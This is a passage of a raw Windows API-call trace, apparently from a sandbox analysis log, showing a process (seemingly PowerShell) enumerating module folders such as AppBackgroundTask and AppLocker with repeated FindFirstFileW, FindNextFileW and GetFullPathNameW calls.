ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0176.690] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0176.690] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0176.691] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0176.691] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0176.691] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0176.691] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0176.692] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0176.692] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0176.692] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0176.692] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0176.692] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0176.692] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0176.693] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0176.693] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0176.693] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5f0) returned 1 [0176.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0176.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.694] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0176.695] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0176.695] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.762] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.762] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0176.762] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0176.762] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.762] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0176.763] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0176.763] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.764] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0176.764] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0176.764] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.765] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.766] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0176.766] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0176.766] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.766] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0176.766] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.766] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.768] CoTaskMemAlloc (cb=0x20e) returned 0x5b1170 [0176.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5b1170, nSize=0x105 | out: lpBuffer="") returned 0x0 [0176.769] CoTaskMemFree (pv=0x5b1170) [0176.770] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0176.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.770] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.771] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0176.771] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0176.771] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.772] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.772] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0176.773] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0176.773] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.773] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0176.773] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0176.773] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.775] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0176.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.778] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0176.778] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0176.778] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 